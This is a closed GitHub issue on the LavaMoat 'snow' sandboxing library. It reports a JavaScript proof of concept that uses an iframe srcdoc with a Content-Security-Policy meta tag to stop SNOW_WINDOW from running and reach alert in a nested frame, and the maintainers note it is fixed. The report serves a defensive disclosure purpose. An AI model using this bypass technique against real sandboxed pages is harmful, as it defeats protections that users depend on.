Closed mmndaniel closed 1 year ago
var d = document.createElement('div'); document.body.appendChild(d); d.innerHTML = ` <iframe srcdoc=" <meta http-equiv='Content-Security-Policy' content="script-src 'nonce-pwnd' ;"> <iframe src="javascript:haha"> </iframe> <script nonce="pwnd">frames[0].alert(1);</script>"> </iframe>`
Similar to https://github.com/LavaMoat/snow/issues/90 and https://github.com/LavaMoat/snow/issues/92, using CSP to prevent SNOW_WINDOW from running :)
SNOW_WINDOW
Think I'm gonna remove srcdoc CSP attempts all together (read further @ #104)
fixed by #104
Similar to https://github.com/LavaMoat/snow/issues/90 and https://github.com/LavaMoat/snow/issues/92, using CSP to prevent
SNOW_WINDOW
from running :)